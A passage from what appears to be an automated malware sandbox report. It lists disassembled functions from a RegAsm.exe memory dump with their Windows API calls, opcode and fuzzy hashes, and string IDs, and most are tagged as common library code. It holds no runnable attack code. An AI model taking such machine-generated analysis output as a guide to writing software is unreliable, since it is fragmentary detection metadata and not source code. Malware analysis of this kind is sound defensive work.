                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005606E5
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0056072F
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005607F5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 661929714-0
                                                                                                                                                                                                                                            • Opcode ID: 5cc1575ac07fd1be7788e5f52ec1c3c90b06fb577efd8ff3707faefbb15aa9ba
                                                                                                                                                                                                                                            • Instruction ID: b8825ce0ddcd1ff02980f796ec14153105a16f0078d0fade5c184c9dc00cbca3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cc1575ac07fd1be7788e5f52ec1c3c90b06fb577efd8ff3707faefbb15aa9ba
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9618D71A012179FEB68DF28CD86BAB7BA8FF04310F145169E905C71C1EB78E984DB90
                                                                                                                                                                                                                                            Function 00552E40 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,-000927C0), ref: 00552F38
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,-000927C0), ref: 00552F42
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,-000927C0), ref: 00552F4F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                                                                            • Opcode ID: 273f035aae7f14a6b4dfe6792bb726f5b47ae1e3e0869db7f4c712dd1db6accd
                                                                                                                                                                                                                                            • Instruction ID: 914a7e64b70086daceee216f4f40908998ec69bd2857afb7b76b9d0786f923e6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 273f035aae7f14a6b4dfe6792bb726f5b47ae1e3e0869db7f4c712dd1db6accd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5931D275901229ABCB21DF68DC8D7CDBBB8BF08314F5041EAE81CA7290E7709B858F44
                                                                                                                                                                                                                                            Function 0055ABF4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00556BAC,?,20001004,00000000,00000002,?,?,0055619E), ref: 0055AC28
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                            • String ID: uS
                                                                                                                                                                                                                                            • API String ID: 2299586839-336044122
                                                                                                                                                                                                                                            • Opcode ID: e34368def71fabd4a441d00151e151d323ee67c6db8f94685c55ba95184f5b7e
                                                                                                                                                                                                                                            • Instruction ID: 27abaa2e25e6ec570ad70da9bd4b10dba6e32fa2f97ba4800da66809e5379cf4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e34368def71fabd4a441d00151e151d323ee67c6db8f94685c55ba95184f5b7e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AE04F7554021DBBDF122F60ED18E9E7F26FF44752F104612FC0566121CB718D65AAA2
                                                                                                                                                                                                                                            Function 005608E4 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00560938
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                                                                                                            • Opcode ID: fcf3895c23e0d12459bf05b3cdfa443e3784f7f002f0e505330fd32bf9724211
                                                                                                                                                                                                                                            • Instruction ID: f167be68da6cba3b94b508fb26314bc8fb4e8a09ad721ba7b90ac913828a93ef
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fcf3895c23e0d12459bf05b3cdfa443e3784f7f002f0e505330fd32bf9724211
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC21D372614206ABEF289B28CC46A7B7BA9FF40310F14106AFD01D7182EB74DD40CB50
                                                                                                                                                                                                                                            Function 0056056B Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00560691,00000001,00000000,?,-00000050,?,00560CC5,00000000,?,?,?,00000055,?), ref: 005605DD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                                                                            • Opcode ID: 2302fc989511a61a6341303f2fb938fb449667c785ec37a17127a3adfef2c5ee
                                                                                                                                                                                                                                            • Instruction ID: 88d3edcc5594b990dec5f0f468fceaeacf04ba4490dd3c0308e73d1cfc152e58
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2302fc989511a61a6341303f2fb938fb449667c785ec37a17127a3adfef2c5ee
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4011E5362007055FDB189F39D8A55BBBBA2FFC0358B14442DE9878BA80D771B952CB40
                                                                                                                                                                                                                                            Function 00560B13 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0056098E,00000000,00000000,?), ref: 00560B3F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                                                                                                            • Opcode ID: a000521a1b8166d69cfdff1fba103528d2541d5e406cc297f0b6b9268b6faa8e
                                                                                                                                                                                                                                            • Instruction ID: 071c0e53b1cbfedcc9781c8b103cf0c166276c39c6a382b39346100c2bb950ff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a000521a1b8166d69cfdff1fba103528d2541d5e406cc297f0b6b9268b6faa8e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A501DB326101167BDB185A24D805BBF3B68FF40758F158429ED06A31D0DA70FD41C690
                                                                                                                                                                                                                                            Function 00560479 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 005604CD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                            • String ID: utf8
                                                                                                                                                                                                                                            • API String ID: 3736152602-905460609
                                                                                                                                                                                                                                            • Opcode ID: fa76924ba7dcb4cac621793e95aeb3d55b6527b35eaca9f48b308d4aae052b8c
                                                                                                                                                                                                                                            • Instruction ID: e86287f522ab647638cf9cde0d680dfada0add3aba76a80579947fe8b819bde0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa76924ba7dcb4cac621793e95aeb3d55b6527b35eaca9f48b308d4aae052b8c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CF0A932610206ABD714AB34DC599BB77DCEB55315F10017AFA02E72C1DE78AD458750
                                                                                                                                                                                                                                            Function 00560606 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(005608E4,00000001,?,?,-00000050,?,00560C8D,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00560650
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                                                                            • Opcode ID: 7503fc05642f47596caccdc37b33f2b4bc0c73a8e4e22d1781419e11bf4177e6
                                                                                                                                                                                                                                            • Instruction ID: f56d249ab91ac548dff3b6e1e0987e3346115741609a770182cfb837293ceb15
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7503fc05642f47596caccdc37b33f2b4bc0c73a8e4e22d1781419e11bf4177e6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6F0C2362003045FDB249F39D895A6B7F95FBC0768F05452DF9058B6D1C6B19C82D650
                                                                                                                                                                                                                                            Function 0055A725 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00558C01: EnterCriticalSection.KERNEL32(-00172DB0,?,00554AB2,00000000,005888B0,0000000C,00554A7A,?,?,0055C2B9,?,?,0055A28F,00000001,00000364,0041C3C8), ref: 00558C10
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0055A718,00000001,00588B70,0000000C,0055AAF0,00000000), ref: 0055A75D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1272433827-0
                                                                                                                                                                                                                                            • Opcode ID: f2588008cb84fb71bc62c284b757f7e79301faa1d7f59c0035dc03f3fdb7a16c
                                                                                                                                                                                                                                            • Instruction ID: 2bf7a53e1ecd4a2700e92f13b87f47b84aa2bfb7e43c1a8dbfe197ed735bb432
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2588008cb84fb71bc62c284b757f7e79301faa1d7f59c0035dc03f3fdb7a16c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53F04F76A11205DFD700EF98E856BAD7BF0FB88725F10412BF801EB290CB7559089F51
                                                                                                                                                                                                                                            Function 00560520 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00560479,00000001,?,?,?,00560CE7,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00560557
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                                                                            • Opcode ID: 433f7082c7aca7455fd27364a80e2a65d60f7d668e02ed5d8cf12382729cb35b
                                                                                                                                                                                                                                            • Instruction ID: 5857d245acb63576c26f5e43ecd3d6841b0e84a395acfde55833b52c304f2aaf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 433f7082c7aca7455fd27364a80e2a65d60f7d668e02ed5d8cf12382729cb35b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06F0553630024997CB149F39E829A6B7F90FFC1710F064059EE068B6A0C672D882CB50
                                                                                                                                                                                                                                            Function 0042CEA0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9198fcdca9e424432a3a8203766c5c8cfaab3a57559baf0a43973d3f4d59e08d
                                                                                                                                                                                                                                            • Instruction ID: c16b9477e39db41abb06177a582d1fb9cc34123ff8719f24c64ea6a20d769a31
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9198fcdca9e424432a3a8203766c5c8cfaab3a57559baf0a43973d3f4d59e08d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15E0C934901208EBCB14DFA4E84979DBBB5FB1C355F4052A6EC04A3360D7349988EB81
                                                                                                                                                                                                                                            Function 00544C22 Relevance: 70.4, APIs: 11, Strings: 29, Instructions: 359COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: shared_ptr$operator+$Name::operator+Name::operator=
                                                                                                                                                                                                                                            • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                                                                                                                                                                            • API String ID: 1464150960-1482988683
                                                                                                                                                                                                                                            • Opcode ID: 97d89e91f73edd29426c38dfb520c3a0690f1fee51e02e2ca597e152d1bbdcd5
                                                                                                                                                                                                                                            • Instruction ID: a74152ec3fe6cbcdd6e66ed103a54149bf6b53857fb999c1198e7a9fbac2c6eb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97d89e91f73edd29426c38dfb520c3a0690f1fee51e02e2ca597e152d1bbdcd5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AE17BB5D0420ADBCB04DFA4C49DAFEBFB8BB08308F10855AD515A7252E7755B09CFA1
                                                                                                                                                                                                                                            Function 00548502 Relevance: 30.0, APIs: 10, Strings: 7, Instructions: 297COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 005485D8
                                                                                                                                                                                                                                            • UnDecorator::getSignedDimension.LIBCMT ref: 005485E3
                                                                                                                                                                                                                                            • UnDecorator::getSignedDimension.LIBCMT ref: 005486CF
                                                                                                                                                                                                                                            • UnDecorator::getSignedDimension.LIBCMT ref: 005486EC
                                                                                                                                                                                                                                            • UnDecorator::getSignedDimension.LIBCMT ref: 00548709
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 0054871E
                                                                                                                                                                                                                                            • UnDecorator::getSignedDimension.LIBCMT ref: 00548738
                                                                                                                                                                                                                                            • _swprintf.LIBCMTD ref: 005487B2
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 0054880D
                                                                                                                                                                                                                                              • Part of subcall function 00544647: DName::DName.LIBVCRUNTIME ref: 005446A5
                                                                                                                                                                                                                                            • DName::DName.LIBVCRUNTIME ref: 00548884
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$_swprintf
                                                                                                                                                                                                                                            • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr$uS
                                                                                                                                                                                                                                            • API String ID: 138750261-172234052
                                                                                                                                                                                                                                            • Opcode ID: c09677eac4ef41ca6d02165598f8bd20fa768965569d5f17ee708976b6763b84
                                                                                                                                                                                                                                            • Instruction ID: 021091b49bba7b252cf704cfd7151fae3891600384b2777c9651b7b3d27b4641
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c09677eac4ef41ca6d02165598f8bd20fa768965569d5f17ee708976b6763b84
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0391D771C0410BAACB19EBB4DC9EAFE7F78FB5530CF64491AF102A6191DF759A088760
                                                                                                                                                                                                                                            Function 0054647A Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 332COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Name::operator+$NameName::$Decorator::getReturnTypeoperator+
                                                                                                                                                                                                                                            • String ID: QuT
                                                                                                                                                                                                                                            • API String ID: 2932655852-2893120971
                                                                                                                                                                                                                                            • Opcode ID: aa5c678fd647dcf6112b951906b66b392665429131e56a6cc116a9c5b71ca7c4
                                                                                                                                                                                                                                            • Instruction ID: 40c04e3d1db91fb46bc78a55f4f1d36e9028165b5c24f5072f060e2fdb628973
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa5c678fd647dcf6112b951906b66b392665429131e56a6cc116a9c5b71ca7c4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89C1747190020AAFCF18EFA4D89AEEE7FB4FB59308F14055EF502A7291DB309A45CB51
                                                                                                                                                                                                                                            Function 005492A6 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 185COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Replicator::operator[].LIBCMT ref: 005492E3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Replicator::operator[]
                                                                                                                                                                                                                                            • String ID: @$`generic-type-$`template-parameter-$generic-type-$q[T$q[T$template-parameter-$uS
                                                                                                                                                                                                                                            • API String ID: 3676697650-742058369
                                                                                                                                                                                                                                            • Opcode ID: b266f6adf8963ed7613a7b2dc4edef15d4e769120d7c20883a63c0eb00490105
                                                                                                                                                                                                                                            • Instruction ID: 9bd8cd0364fcd6040279b2118463d8ac451244748b86cd66e3e79245c58435c9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b266f6adf8963ed7613a7b2dc4edef15d4e769120d7c20883a63c0eb00490105
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F61C171D00209AFCB04DFA4D847AEFBFB8BF59318F104419EA41B72A1DB749A09CB90
                                                                                                                                                                                                                                            Function 00540110 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 154memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,0041F869,0041F86B,00000000,00000000,CA1D138C,?,?,?,Function_00140780,00588468,000000FE,?,0041F869,00000001), ref: 00540199
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,0041F869,?,00000000,00000000,?,Function_00140780,00588468,000000FE,?,0041F869), ref: 00540214
                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 0054021F
                                                                                                                                                                                                                                            • _com_issue_error.COMSUPP ref: 00540248
                                                                                                                                                                                                                                            • _com_issue_error.COMSUPP ref: 00540252
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(80070057,CA1D138C,?,?,?,Function_00140780,00588468,000000FE,?,0041F869,00000001), ref: 00540257
                                                                                                                                                                                                                                            • _com_issue_error.COMSUPP ref: 0054026A
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,Function_00140780,00588468,000000FE,?,0041F869,00000001), ref: 00540280
                                                                                                                                                                                                                                            • _com_issue_error.COMSUPP ref: 00540293
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                                                                                                            • String ID: uS
                                                                                                                                                                                                                                            • API String ID: 1353541977-336044122
                                                                                                                                                                                                                                            • Opcode ID: 71b1ed4183e2e368b4fa1349d6540803a7ace21301d1342b97019e13a4dc057d
                                                                                                                                                                                                                                            • Instruction ID: 921b6c734bfe912ccb6cad27f360aa9d70cc9ae2e3493677c95e6d37f0840b02
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71b1ed4183e2e368b4fa1349d6540803a7ace21301d1342b97019e13a4dc057d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB41D875A04205ABDB109F68DC4DBEEBFA8FB44718F305229FA19E72C0D7B49900D7A4
                                                                                                                                                                                                                                            Function 005473F8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 178COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: operator+shared_ptr$NameName::
                                                                                                                                                                                                                                            • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                                                                                                                                            • API String ID: 2894330373-757766384
                                                                                                                                                                                                                                            • Opcode ID: 5b39598cdee701266bcd4a29a5489d3849a13c986ccccceb71feb6398e236aa2
                                                                                                                                                                                                                                            • Instruction ID: 4034a84d63f7c806bf9577f67474e9ac594c017c4b04d29f7d75d20f32ae8d92
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b39598cdee701266bcd4a29a5489d3849a13c986ccccceb71feb6398e236aa2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06618D7180810EEFCF14DFA8C8499F9BFB5FB49308F14856AE8459B221E3769A05DF90
                                                                                                                                                                                                                                            Function 00547646 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
